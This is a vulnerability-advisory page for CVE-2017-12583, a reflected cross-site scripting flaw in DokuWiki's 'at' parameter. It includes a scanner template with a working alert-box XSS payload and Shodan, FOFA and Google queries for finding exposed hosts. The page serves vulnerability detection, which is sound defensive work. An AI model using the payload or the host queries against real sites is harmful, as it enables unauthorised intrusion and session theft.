CVE-2017-12583: DokuWiki - Cross-Site Scripting

2025-08-01 DokuWiki PoC Public

Description

DokuWiki through 2017-02-19b contains a cross-site scripting vulnerability in the DATE_AT parameter to doku.php which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

PoC

id: CVE-2017-12583

info:
  name: DokuWiki - Cross-Site Scripting
  author: DhiyaneshDK
  severity: medium
  description: DokuWiki through 2017-02-19b contains a cross-site scripting vulnerability in the DATE_AT parameter to doku.php which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Upgrade to the latest version of DokuWiki or apply the provided patch to fix the XSS vulnerability.
  reference:
    - https://github.com/splitbrain/dokuwiki/issues/2061
    - https://nvd.nist.gov/vuln/detail/CVE-2017-12583
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2017-12583
    cwe-id: CWE-79
    epss-score: 0.03253
    epss-percentile: 0.87709
    cpe: cpe:2.3:a:dokuwiki:dokuwiki:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: dokuwiki
    product: dokuwiki
    shodan-query:
      - http.title:"DokuWiki"
      - http.title:"dokuwiki"
      - cpe:"cpe:2.3:a:dokuwiki:dokuwiki"
    fofa-query: title="dokuwiki"
    google-query: intitle:"dokuwiki"
  tags: cve,cve2017,xss,dokuwiki,vuln

http:
  - method: GET
    path:
      - '{{BaseURL}}/dokuwiki/doku.php?id=wiki:welcome&at=<svg%20onload=alert(document.domain)>'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'Unable to parse at parameter "<svg onload=alert(document.domain)>".</div>'

      - type: word
        part: header
        words:
          - 'text/html'

      - type: status
        status:
          - 200
# digest: 490a0046304402201a6459ebd54b883b00abb5e9b8efc95292b3d1e2b750390fe4ac272159a9f55102206192b6d44d7347f00b8997a35d73b2e7bbbcca2956f208fe358fa6a84e4937a5:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities